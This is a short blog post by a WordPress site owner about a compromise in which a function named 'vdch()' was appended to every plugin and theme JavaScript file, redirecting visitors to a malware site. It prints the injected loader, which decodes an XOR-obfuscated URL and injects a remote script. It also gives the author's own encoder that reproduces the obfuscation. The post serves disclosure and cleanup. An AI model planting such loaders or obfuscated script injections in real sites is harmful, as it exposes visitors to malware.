I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.

Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).

Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.

Update: As I just read in this forum, on stackoverflow and on wordpress, they seem to compromise php and html files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability because its built-in editor only allows you to edit plugins and themes.

This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.

function vdch() {
    if(document.all.length > 3) {
        var t = new Array(...);
        var dchid = "";
        for (j=0;j<t.length;j++) {
            var c_rgb = t[j];
            for (i=1;i<7;i++) {
                var c_clr = c_rgb.substr(i++,2);
                if (c_clr!="00") dchid += String.fromCharCode(
                        parseInt(c_clr,16)^i);
            }
        }
        var dch = document.createElement("script");
        dch.id = "dchid";
        dch.src = dchid;
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdch()",500);
    }
} setTimeout("vdch()",500);

Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).

var url = "http://your.url/";
var enc = new Array();
var rgb = "#";

for (i = 0, j = 2; i < url.length; i++, j += 2) {
    rgb += (url.charCodeAt(i)^j).toString(16);
    if (j == 6) {
        j = 0;
        enc.push(rgb);
        rgb = "#";
    }
}